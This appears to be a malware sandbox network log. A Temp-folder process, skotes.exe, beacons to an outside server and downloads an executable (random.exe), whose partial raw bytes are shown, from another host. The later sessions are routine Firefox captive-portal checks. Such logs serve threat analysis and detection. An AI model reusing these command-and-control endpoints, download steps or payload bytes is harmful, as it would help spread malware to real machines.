Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49932	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:58.909826994 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015355001&unit=246122658369
Dec 14, 2024 23:59:00.270418882 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49938	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:00.393460989 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:59:01.735656977 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:01 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 14, 2024 23:59:01.735831022 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 14, 2024 23:59:01.735878944 CET	448	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 14, 2024 23:59:01.736109972 CET	1236	IN	Data Raw: 56 8b f1 8d 4e 08 c7 06 58 a5 41 00 e8 fa 0a 01 00 f6 44 24 08 01 74 07 56 e8 f1 79 01 00 59 8b c6 5e c2 04 00 55 8b ec 51 56 57 ff 75 08 8b f1 8d 4e 0c e8 26 1e 01 00 ff 75 0c 8d 7e 10 8b cf e8 63 fb ff ff 6a 5c 8b cf e8 ec fe ff ff 33 ff 8d 45 Data Ascii: VNXAD$tVyY^UQVWuN&u~cj\3EPWVh<@WW5dA=lAA=AhAtsj5hAAlA;=XAt2t!ttg~k~}PjKjjjW\|YYd9=`Au\EP5hAAMt;u
Dec 14, 2024 23:59:01.736347914 CET	1236	IN	Data Raw: 48 08 89 78 10 89 78 14 e8 2c 07 01 00 84 c0 0f 85 b0 00 00 00 ff 15 98 a1 41 00 53 8d 4d e4 89 45 08 e8 7b f6 ff ff 8d 45 e4 50 e8 5e 16 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 f1 74 01 00 8b 45 0c 3b c7 59 74 06 Data Ascii: Hxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6YujhVPF jSHxxuAPjjVS uwtYuMVEM0g#E8>AP
Dec 14, 2024 23:59:01.736382961 CET	1236	IN	Data Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50 Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
Dec 14, 2024 23:59:01.736821890 CET	1236	IN	Data Raw: 83 25 84 e9 41 00 00 c3 83 25 84 e9 41 00 00 68 60 a6 41 00 68 c4 a5 41 00 ff 15 68 a1 41 00 50 ff 15 6c a1 41 00 85 c0 74 11 68 88 e9 41 00 ff d0 c7 05 84 e9 41 00 01 00 00 00 c3 56 8b 74 24 08 85 f6 75 05 33 c0 40 5e c3 e8 3f ff ff ff 83 f8 09 Data Ascii: %A%Ah`AhAhAPlAthAAVt$u3@^?uuu@;t3^US3EPSSSSSSh j jEP]]]]]]]EAtEPuSAuAE[UEVpEtKQ;SW}=3~'4<
Dec 14, 2024 23:59:01.736854076 CET	1236	IN	Data Raw: 5e c2 04 00 53 56 8b f1 8b 06 33 db 57 8b 7c 24 10 89 5e 04 88 18 38 1f 74 07 43 80 3c 3b 00 75 f9 53 e8 33 fc ff ff 8b 06 8a 0f 88 08 40 47 84 c9 75 f6 5f 89 5e 04 8b c6 5e 5b c2 04 00 56 57 8b 7c 24 0c 8b f1 3b fe 74 25 83 66 04 00 8b 06 c6 00 Data Ascii: ^SV3W\|$^8tC<;uS3@Gu_^^[VW\|$;t%fw@AuGF_^Vj&NT$FF^SVW\|$38tC<;uSF@Gu^_^[VW\|$wF@A
Dec 14, 2024 23:59:01.736887932 CET	1236	IN	Data Raw: 8d 45 f4 50 e8 46 fd ff ff 83 c4 0c 80 7d 10 00 5f 5e ff 75 f4 75 14 ff 35 80 e0 41 00 6a 0b 6a 00 e8 61 65 00 00 83 c4 10 eb 0c 6a 20 6a 00 e8 53 65 00 00 83 c4 0c ff 75 f4 e8 ac 61 01 00 ff 75 e8 e8 a4 61 01 00 59 32 c0 59 c9 c3 55 8b ec 83 ec Data Ascii: EPF}_^uu5Ajjaej jSeuauaY2YU4VWME0>fS^f~Ff=xufS1Y\|[PMMjEPEPPMu&aYEPMkuauaYYKFf=X
Dec 14, 2024 23:59:01.737498999 CET	1236	IN	Data Raw: 61 04 00 00 57 ff d6 ff 75 dc e8 08 5d 01 00 ff 75 e8 e8 00 5d 01 00 59 59 8b c7 e9 18 ff ff ff 55 8b ec 51 53 56 57 8b 3d 28 a1 41 00 6a 01 8d 45 fc 50 ff 75 0c ff d7 8b 75 08 8b ce 8b d8 e8 54 df ff ff 8d 43 02 50 8b ce 89 45 08 e8 fb f4 ff ff Data Ascii: aWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj\Ytt$3P.^UVF9EW~EMyt5WEPe3~MSUfBf@AA;\|[~
Dec 14, 2024 23:59:01.855638027 CET	1236	IN	Data Raw: 3d 2f 00 75 09 66 89 74 5f fe 4b 89 5d fc 8b f3 eb 22 0f b7 04 77 66 3d 2f 00 74 0b 66 3d 5c 00 74 05 4e 85 f6 7f eb 85 f6 0f 84 b4 00 00 00 66 83 24 77 00 57 e8 0a e4 ff ff 85 c0 59 74 e4 8d 45 f4 50 ff 15 f0 a0 41 00 57 ff 15 a4 a1 41 00 a8 10 Data Ascii: =/uft_K]"wf=/tf=\tNf$wWYtEPAWAuEPWYYt3WYuWjj_[;}NE+@PEpPwSW3f9twf=\tf=/tFf9wuWfwwYt;u\|WfW3Y@EMu(ff f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49945	34.107.221.82	80	4584	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:02.621279955 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49963	34.107.221.82	80	4584	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:08.355552912 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:09.443339109 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68436 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49968	34.107.221.82	80	4584	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:10.342180014 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:11.429235935 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68438 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:21.465787888 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 23:59:22.291070938 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:22.606424093 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68449 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:32.678668022 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 23:59:37.225907087 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:37.540879011 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68464 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:39.565249920 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:39.880192041 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68466 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:42.984739065 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:43.299586058 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68470 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:45.733367920 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:46.048317909 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68472 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:46.962316990 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:47.284938097 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68474 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:49.005135059 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:49.320939064 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68476 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 23:59:56.663301945 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 23:59:56.984633923 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68483 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:00:00.667376995 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:00:00.983045101 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68487 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:00:11.071664095 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:21.276376009 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:22.045437098 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:00:22.360635996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68509 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:00:32.362437010 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:42.564945936 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:00:52.761765003 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:02.978131056 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:03.299308062 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:01:03.614187956 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68550 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:01:13.675571918 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:23.868680000 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 15, 2024 00:01:58.207644939 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:01:58.630177021 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68605 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 15, 2024 00:02:25.116622925 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 15, 2024 00:02:25.431524992 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 14 Dec 2024 03:58:33 GMT Age: 68632 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
